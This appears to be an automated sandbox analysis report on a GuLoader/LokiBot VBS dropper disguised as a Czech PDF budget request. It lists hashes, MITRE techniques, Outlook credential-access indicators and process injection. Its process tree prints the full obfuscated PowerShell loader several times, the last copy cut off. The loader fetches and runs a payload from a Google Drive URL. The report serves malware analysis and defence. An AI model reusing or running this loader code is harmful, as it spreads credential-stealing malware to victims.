guloader | 1b8f8f752a1c7259f7f09702569ecdd5b1074d9816adcca96632fdef0733c8f5

General

Target

ŽÁDOST O ROZPOČET 09-23-2024·pdf.vbs
Size

35KB
MD5

fa21d757a727ace9fab8ba22e03f7dc5
SHA1

edaa3726683853a70e8176f2368e3254192a9a11
SHA256

b8911aa1f56a7803220464354c15dbdce5c70d0b66b03bd0aba25c0155f2f161
SHA512

3aaee7bc7a1726c193c36362d952c64eae4dc49ef2946bf430d8367cc012317ee7de3a761d3d079af72b8ce61d029b19f8fa3f24e1d8ba4d46064e0301f60925
SSDEEP

384:3ccI8+xqQKYYKmlKCKQakPsZOqP1tVzFdk4GL283f48QihlTCEAZpdk/yKR:sc+AnjlKCKgE77V0z7lTCEAZIDR

Score

10^/10

guloader lokibot collection credential_access discovery downloader spyware stealer trojan

Malware Config

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	2152	WScript.exe
7	1712	powershell.exe
9	1712	powershell.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	wabmig.exe
Key opened	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

Network Service Discovery 1 TTPs 3 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2632	powershell.exe
1712	powershell.exe
2612	cmd.exe

Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

pid	Process
2904	wabmig.exe
2904	wabmig.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2632	powershell.exe
2904	wabmig.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2632 set thread context of 2904	2632	powershell.exe	38

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wabmig.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2632	powershell.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1712	powershell.exe
2632	powershell.exe
2632	powershell.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2632	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	2632	powershell.exe
Token: SeDebugPrivilege	2904	wabmig.exe

Suspicious use of WriteProcessMemory 23 IoCs

description	pid	Process	procid_target
PID 2152 wrote to memory of 1712	2152	WScript.exe	30
PID 2152 wrote to memory of 1712	2152	WScript.exe	30
PID 2152 wrote to memory of 1712	2152	WScript.exe	30
PID 1712 wrote to memory of 2780	1712	powershell.exe	32
PID 1712 wrote to memory of 2780	1712	powershell.exe	32
PID 1712 wrote to memory of 2780	1712	powershell.exe	32
PID 1712 wrote to memory of 2612	1712	powershell.exe	35
PID 1712 wrote to memory of 2612	1712	powershell.exe	35
PID 1712 wrote to memory of 2612	1712	powershell.exe	35
PID 2612 wrote to memory of 2632	2612	cmd.exe	36
PID 2612 wrote to memory of 2632	2612	cmd.exe	36
PID 2612 wrote to memory of 2632	2612	cmd.exe	36
PID 2612 wrote to memory of 2632	2612	cmd.exe	36
PID 2632 wrote to memory of 2060	2632	powershell.exe	37
PID 2632 wrote to memory of 2060	2632	powershell.exe	37
PID 2632 wrote to memory of 2060	2632	powershell.exe	37
PID 2632 wrote to memory of 2060	2632	powershell.exe	37
PID 2632 wrote to memory of 2904	2632	powershell.exe	38
PID 2632 wrote to memory of 2904	2632	powershell.exe	38
PID 2632 wrote to memory of 2904	2632	powershell.exe	38
PID 2632 wrote to memory of 2904	2632	powershell.exe	38
PID 2632 wrote to memory of 2904	2632	powershell.exe	38
PID 2632 wrote to memory of 2904	2632	powershell.exe	38

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	wabmig.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	wabmig.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ŽÁDOST O ROZPOČET 09-23-2024·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Hygrophthalmic.dis && echo t"
    3⤵
    PID:2780
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs AfspTNazipeD vinMA isb.Skalkn DessE KnkktHeads.MisgowQuincenonimBafri cambulL Bromi StraeDialanunvort');$Uforskyldte+=$Vandhane[1];Planchers ($Uforskyldte);Planchers (Disinclose 'rask $ Co.nSCydonaBevelmInducmPer,oeForetn U frk igarn DesoyIntertAltsgtCovere FlamrSe.ia.AggluH OccueHvo iaNavnedParameMoldirArb jsRundh[ Orga$KnublEAtionl SprneSert.pBleskhHistoajrtegnmart,t DelpsMisop]Ufriv=Fishe$ oranLPri snKammesCarbiuGulnemAftenmRetsveSeracn For.sEndos ');$Hognut=Disinclose 'Op im$Sy ebSWi lyaBagermFut.rmAfspneo.rusn I,ogk.ermin ave y plattRummitCatche orbyrPolit.FormiDGab noSaxopwSyllonSk,ivl Tenoo BegraSpecidVirgiFvmme iKlu klUndepe Ka l(Eosid$Fo anNPleuraEnfratUnturuSkil.r.rovegSi keiCystovP iornUdbyteSwim,, Refe$LuiscdPhy.la BallcUdklatT taly de,al Drb.i Vin sNonpl)Ensil ';$dactylis=$Vandhane[0];Planchers (Disinclose '.ovet$TilkbgErgatlKrmmeo,rrisBKommuaRhamnlOver :RegenT Fr mAPre uK Do.nk StorENat eBsubh nP ejnn ,hefeMisadR U dd= rele(NahuatF idaeHymensBaf et Besv- Pri PAbnakAFructtSpec HClamm Trko.$Anterd CachAEjendCKlimaT gulvYHaandlUdkraiTomtesPos,s)Raill ');while (!$Takkebnner) {Planchers (Disinclose 'Exs c$Formbg R,tul f mco Sta bFolkeaAllerl Pho :UenigMSkrivu fluel Up.itO,erdiDiktaf Vandu lakenUdklacAttratFors,i,xtraoK ersnKahyt=Turri$RamastshelfrPampeuAphoteInter ') ;Planchers $Hognut;Planchers (Disinclose 'Kidd S NonbtsammeaGalgerLan stVibra-A,kriSUdma lKvabse VrtieBuddhpMirza Rede4,indb ');Planchers (Disinclose 'Turbo$polt.gMisnulTr maoNordebFlderaHala,l,ekyl:ForstT MajoaSulphkOverskAfvr eAntidbWin rnFrithnSkibseColter tand=Skde ( IsomTSpilleO.pebsTermitcurbl- Chu,PF,rlna Longt ,oldhJiggl Film $FaculdIndflaSabelc nict fleySmithlSh.rliAkvamsVerdo)Und.c ') ;Planchers (Disinclose ' Biri$,echegL ftmlInteroKont bIngseaAfhndlForfa:Pa tiAAs romAntist Fires Ko ekSkycaoloquamForv,massisu pse nF emte Se asT.rrw=dr.st$TrafigCupsel ntero Molib FolkaFisk,l asif: FierTUnta iOverspTi.rebPsychaWimplrCupcaeMutuasDev a+Bagho+Alitd%Bidac$TelesIOdlevnHirunf StoprPr.epaUmbr,mKolore CruirTyrancProj.u DdfdrD ligiL.proaOpdatnSamfu. Co,fcGafleoSjlesuDevasnVitiltO.ean ') ;$Naturgivne=$Inframercurian[$Amtskommunes];}$Declinable=334824;$duellanter=29405;Planchers (Disinclose 'Dan s$Bladeg VorhlRo.lioSta ubMlkssaProfelFripa: MelaQ TreduKa toaWoofed Nrs,rTahalaWattmnGuldbg ,ounlTppeleRhymedRela Repar= iop ConniGTrabaeCoelatBrn s-AffalCParatoStylonSpecttKargoeAkkvin HematSkova Restr$.elandPiquaaAvocacmattetSkrubyWharelLiqu.i jemmsUbiq. ');Planchers (Disinclose 'Pizza$ ndtjgdrypplI.dtnoOpdknbSubheaForg lNomog:boxesTxerogiFarvenCaloraDerelgVulpee Wate Trans=Tavle Ablat[ axinS pottyUnhees KombtPostseDeccimBrasi.M,croCS.reho inyanDredgv DorseReferrNibbet Urea] Crap:Cerat:PerigFSammermiswiosvovlmParadBSamtiaIncorsHurlbeLigbl6prion4Ta.blSDe fltPa errVesteiReknonArc.igS.eri( tops$TinklQ Aggru R asa AssidTemperDrypvaAstronCocktgn.rmalRig deRho od Kata)Sil,a ');Planchers (Disinclose 'Sydst$GenergSkovtl .elfoAtionbFyrreaLithol F rv:muligUArbejlretortAmrberShetlaFg nim RestoBoslon CynotTkkenaK ammnHype e Fjor Fl.uc=R ina Antil[RightS Gymny VulgsStuditkompae IndhmRhamn.SlatiTA varesubcoxHvlvetUnder. PhosELeap nEskadcForkloUrkokdSkrd ieddi.n stangKjort]S,ine: etin:AktstAKr geSKlapsCPolygI for,I Indi.Go erGF emmeForest NewzSAfdritBohemr ilgiiPh tonUdfung Elec( N ll$StormT prisiHotelnSkbneaSpo,sgCorneees or) Nons ');Planchers (Disinclose 'salpe$ ampagincublRorp oSlethbNed,ua MetalFo,br:I hneAu crynOve plSatsegStormsAdjurg iguraP rthr ublitAnfren.crodeTiltvr trafi prove emirAugme=Tami $P ykoUScopolDignitFluktrSpotraBae.ymLatt oStrabnFritit Debaa LigknDespoeViktu..andbsFor,wusilhob IsopsSp idt DevirTikaniInsubnNeddyg Out (Bronc$Unw aDWo dhe.angac verlSnrkeiBetalnTra ca ubskbBetjelexpeceBedre,Subj $Com udBasi.uScobleCoydol enzlSlyngaKrig.nRddeltFjesceHabitr Sylf)antec ');Planchers $Anlgsgartnerier;"
    3⤵
    - Network Service Discovery
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Byggest Nectocalyces Summarises #>;$schedar='Bardunstrammeren';<#Rhomboidally Ellipsoides Flkkser Trdokker #>;$Slipperweed=$host.PrivateData;If ($Slipperweed) {$Unplunderous162++;}function Disinclose($Dokstningen){$Tapery=$Dokstningen.Length-$Unplunderous162;for( $Kulos=5;$Kulos -lt $Tapery;$Kulos+=6){$Medunderskriv74+=$Dokstningen[$Kulos];}$Medunderskriv74;}function Planchers($viraginous){ & ($enrich) ($viraginous);}$Lnsummens=Disinclose 'RamipMOpholo Vrvlz IntriPhylolGeumalHyperasuper/P oto5Orga . omor0Hldni forma( O elWWitt iGallon Dat.dFo.eno Blksw.andbsHospi VaaseNWann,TSnurs C rne1Bimil0Schch. Ti,e0Abbie; Efte Trl WBeli iSch,znBygme6 Aspi4 alte;Forfl Fis exThysa6 Sylf4Afgif; Kolo Pur urPoseivTasse: A ti1Comec2Kund,1Merva.Forhj0Tra k) Mark ReferGGv.reeBegrlcUnc lkBedknoTroll/ Lovf2R.ndd0S ant1Bear 0 Bran0 Ulvs1Tup e0Gt sk1E ert SacliFTrommiPo,chrUdfrseParfefBankkoDeltax G um/Svves1Rerem2Midde1 Arch.Cusse0Sla s ';$Elephants=Disinclose ' L.dyuGangsSTyponETabu.RBokse-Uopl A BabbGUnmine Spe.N Gin,TC cae ';$Naturgivne=Disinclose ' onclhVolumtKli pt s.ibpAdelssTypis: Spri/ S,na/ LevadVejt.rTurneiUkrnkvOu dueFriez.PolyhgSerigoHuxtao Subtgspa tlRg,rleGuver.jud icO,livoPotenm Para/SkinnuEastbcHus.a?HoejseAyenfx BugspFlytnoPensir ReactTimem=Hvoridmelcho Ned wspedanT.gerl HepaoStormaRidsedAvi d&Be wai n,nrd Puma=Stb s1Flyc z minkcS vla5krediiDic,ytT norz DwarVLa.seGMagisJ .remiD vaseSemipYHarm,ABestu- TrirEMidte7KrydsRAfmrkA,undrrGldels BlomGSuperJ ba sJV terEPladePPoste5 ReekWspa omVac.uRAitesPnegliTForngkcent ';$Unprophetically=Disinclose 'B sto>Vridn ';$enrich=Disinclose 'StyleiHyp.eEUnd.lxUxo.i ';$Commonwealths57='Enurny';$Cyclometres = Disinclose 'TjeneeFl sncMishahOrkesoNialt Stand% Stomafnat pAeropp Fored Pampa S betUnphoaSorgl%Synsa\ Ef,eHHonduyBorergMunicrRes toOutropMin ahInf kt E hihLeveraUnundlVergimLathiinissecrecra. UdfldSalgsiMak ksKon m Malar& Aw.a&Flomm vineNormacTelefhEksalo Kada Mediat Blnd ';Planchers (Disinclose 'E ter$cote,gGaranl lacioJoggibLiquea.lamel Wac.:nimroVSoftlaValidnSeggid.rskeh,mpelaSabbanConveeProdu=Udstr(DefilcUncerm ElfedStatu Trans/ Fis cNonde Kon.$Idi.tCT eneyCard.cCensul ForloOve fm F gueFort.tEpicar C.areAilers Unsa)espad ');Planchers (Disinclose 'Ethan$CubdogHo delFlgeso.sprab Sulea Maryl .eel:DummkIl erinHu mefCuppir iageaBlessmRedireBore r Albocspermukne,arCowslinokkeaforplnRaksh=Strik$NvnemNBefumaRaff,tFlutturedskrFor dg olyiiO.teiv OvernBell et.tem.QueuesSa mepTiltvlWa vei Unr tSam a(Tjene$An,teUStarcnBeglep Was,rR,gnsoKnok pbaggahExurgeStngetFunktiDio tcSa ioaOverylProtolBjergyDoppe) Hirt ');Planchers (Disinclose ' Uds,[ RaadN nmese Matctgru,p.Soa lSSylpheSphenrIndbyvTypeeiS gelcKronoeAar mPRoomio SikkiProd n itchtMonodM .eriaWhipsnRy sjaFul cg DarieKle.urOndsk] F na:Uns.a: ondiSel eveAgurkcLokaluAlko rBibesiCloddtMaa eyDesioPBoligrStakloSt gmtBakkeoundivcJeb ioSuc.el nshi Bank =Unfac Depon[FrednNS.ciaeEvulgtibsen.SludeS SupeeFro,tcCruciuRosarrSouthiRodektUnproyJ aquPDampsrFo,bio nsttt Un goDrycocCorpuoD semlOpka.TansaeyUnpatpS ieleKalib]Rekvi:An id:ProppTSpiculTwin,s Subj1 Nyhe2Fam.l ');$Naturgivne=$Inframercurian[0];$Uforskyldte= (Disinclose 'Quino$BandegHushoLSmithOblgelbFin.raAcc,slRecla: CozeSvava a arpomCivilmadpreE No.vnLokalKLektonHv skYTrageTbegynTBonvie ConsRRaatr= avounCro zeOvervwPolen-PreteOCuredBSilicJForsgeper ucpiggeTP.eud c evvSfacetYAfstrs 